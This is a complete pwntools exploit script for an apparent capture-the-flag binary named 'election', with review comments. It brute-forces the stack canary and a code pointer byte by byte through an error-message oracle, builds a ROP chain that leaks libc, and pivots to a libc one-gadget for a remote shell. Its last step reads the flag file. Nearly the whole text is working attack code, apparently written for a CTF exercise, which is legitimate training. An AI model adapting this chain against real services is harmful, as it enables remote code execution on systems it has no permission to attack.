#!/usr/bin/env python
from pwn import *
# Harness setup (pwntools).  The target binary and its matching libc are
# loaded only for symbol/offset lookup; ``y`` is the live connection that
# every helper below talks to.  The commented-out lines switch between the
# remote service and a local process under the debugger.
context.arch = 'amd64'
e = ELF( '../election/share/election' )
l = ELF( './libc-2.27.so' )
y = remote( 'localhost' , 10180 )
#y = remote( 'edu-ctf.csie.org' , 10180 )
#y = process( '../election/share/election' )
#pause()
def login( tok ):
    """Pre-login menu entry 1: log in with ``tok``.

    ``tok`` is forwarded unchanged (it may contain arbitrary bytes); no reply
    is consumed here, the caller reads the server's answer itself.
    """
    exchanges = [ ( '>' , '1' ) , ( ':' , tok ) ]
    for prompt , answer in exchanges:
        y.sendafter( prompt , answer )
def reg( tok ):
    """Pre-login menu entry 2: register a new session whose token is ``tok``.

    ``tok`` is sent raw; nothing is read back.
    """
    exchanges = [ ( '>' , '2' ) , ( ':' , tok ) ]
    for prompt , answer in exchanges:
        y.sendafter( prompt , answer )
def logout():
    """Post-login menu entry 3: end the current session (no reply is read)."""
    choice = '3'
    y.sendafter( '>' , choice )
def vote( idx ):
    """Post-login menu entry 1: cast a vote for ``idx`` (sent as decimal text)."""
    candidate = str( idx )
    y.sendafter( '>' , '1' )
    y.sendafter( ':' , candidate )
def say( idx , data ):
    """Post-login menu entry 2: attach the message ``data`` to entry ``idx``.

    ``data`` is sent raw after the ``Message: `` prompt; no length limit is
    applied on this side, so whatever bound exists lives in the server.
    """
    steps = (
        ( '>' , '2' ),
        ( ':' , str( idx ) ),
        ( 'Message: ' , data ),
    )
    for prompt , payload in steps:
        y.sendafter( prompt , payload )
# NOTE(review): the leading whitespace was lost in the copied listing; the
# indentation below is reconstructed from the control flow -- confirm against
# the original file.  The script is Python 2 (print statement; str doubles as
# a byte string, which u64()/ljust() rely on).
#
# Two server-side weaknesses are visible from this client: a token/message
# copy that reaches the stack canary and the saved return address, and an
# error reply ('Invalid token') that reveals, per byte, whether an over-long
# token matched.  Bounding that copy or not reporting partial matches would
# break every stage below.

# --- Stage 0: a session whose token is exactly 0xb8 bytes ------------------
reg( 'a' * 0xb8 )
tok = 'a' * 0xb8

# --- Stage 1: recover the stack canary one byte at a time ------------------
# The canary's low byte is fixed at 0x00 (glibc x86-64 convention), so only
# seven bytes are searched, at most 256 guesses each.  Candidates run from
# 0xff downwards; a guess is accepted when the reply does not contain
# 'Invalid token'.  This only converges if the canary is the same on every
# attempt (e.g. a forking server that never re-execs) -- assumption, the
# server is not visible here.  Nothing detects the case where no byte matched.
canary = '\0'
for i in range( 7 ):
    print i
    for c in map( chr , range( 0xff , -1 , -1 ) ):
        login( tok + canary + c )
        o = y.recvline()
        if 'Invalid token' not in o:
            canary += c
            info( hex( u64( canary.ljust( 8 , '\0' ) ) ) )
            logout()
            break
success( 'cananry -> %s' % hex( u64( canary ) ) )

# --- Stage 2: recover the code pointer stored right after the canary -------
# Same search over the six bytes that follow the canary in the token layout
# (user-space x86-64 addresses fit in 48 bits, so the top two bytes are 0).
# Which saved pointer this is cannot be told from here; 0x1140 is its offset
# from the binary's load base -- TODO confirm against the binary.
pie = ''
for i in range( 6 ):
    print i
    for c in map( chr , range( 0xff , -1 , -1 ) ):
        login( tok + canary + pie + c )
        o = y.recvline()
        if 'Invalid token' not in o:
            pie += c
            info( hex( u64( pie.ljust( 8 , '\0' ) ) ) )
            logout()
            break
pie = u64( pie.ljust( 8 , '\0' ) ) - 0x1140
e.address = pie  # rebase the ELF so e.got / e.plt resolve to runtime addresses
success( 'pie -> %s' % hex( pie ) )

# --- Stage 3: 25 rounds of register / login / vote / logout ----------------
# Purpose is not evident from this file -- presumably it drives server-side
# state (vote counters) into a shape the later stages depend on; verify
# against the binary before changing the counts.
for i in range( 25 ):
    print i
    reg( 'a' )
    login( 'a' )
    for j in range(10):
        vote( 1 )
    logout()
    reg( 'a' )
    login( 'a' )
    for j in range(5):
        vote( 1 )
    logout()

# --- Stage 4: ROP chain staged in a known writable buffer ------------------
# Every offset is relative to the recovered load base and belongs to this
# specific build of the binary.
buf = pie + 0x202160   # writable area the chain is staged in
leave_ret = pie + 0xbe9   # 'leave; ret': moves rsp to rbp, i.e. onto `buf`
pop_rdi = pie + 0x11a3
csu = pie + 0x1180   # presumably the __libc_csu_init call gadget (name only) -- confirm
ppppppr = pie + 0x119a # pop rbx; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# Chain layout, 8-byte slots (context.arch = amd64), offsets from `buf`:
#   0x00  0                       consumed by the 'pop rbp' of the pivot
#   0x08  pop_rdi / got / puts    puts(got.__libc_start_main): leaks a libc address
#   0x20  ppppppr + 6 values      rbx=0 rbp=1 r12=buf+0xa0 r13=0 r14=buf+0x98 r15=0x100
#   0x58  csu                     presumably calls [r12] with (r13, r14, r15),
#                                 i.e. read(0, buf+0x98, 0x100) -- confirm gadget
#   0x60  seven 0s                eaten by the gadget's 'add rsp,8' and six pops
#   0x98  0x7777777               placeholder: the staged read() overwrites it with
#                                 the address sent in stage 6, which the final ret uses
#   0xa0  e.plt.read              the function pointer [r12] the csu gadget calls
p = flat(
    0,
    pop_rdi,
    e.got.__libc_start_main,
    e.plt.puts,
    ppppppr,
    0, 1, buf + 0xa0, 0, buf + 0xa0 - 8, 0x100,
    csu,
    0, 0, 0, 0, 0, 0, 0,
    0x7777777,
    e.plt.read
)

# --- Stage 5: deliver the chain, overflow the message, pivot ---------------
login( p )   # the chain travels as a token; presumably it ends up at `buf` -- confirm
login( 'a' )
# Message body: 0xe8 bytes of filler up to the canary, the recovered canary,
# saved rbp = buf, return address = leave_ret.  The last byte is dropped
# (p[:-1]); presumably the server's input handling supplies the final 0x00,
# which is what leave_ret's top byte is under a canonical load address.
p = flat(
    'a' * 0xe8,
    canary,
    buf,
    leave_ret
)
say( 1 , p[:-1] )
logout()   # returning from the overflowed frame triggers the pivot (inferred)
y.recvline()
# puts() prints the 6 significant bytes of __libc_start_main's address.
l.address = u64( y.recv(6) + '\0\0' ) - l.sym.__libc_start_main
success( 'libc -> %s' % hex( l.address ) )

# --- Stage 6: answer the pending read() with the final jump target ---------
one = 0x10a38c   # offset into libc-2.27 taken from this script; presumably a one-gadget -- confirm
y.send( p64( l.address + one ) )
sleep( 0.3 )
y.sendline( 'cat /home/`whoami`/flag' )
y.interactive()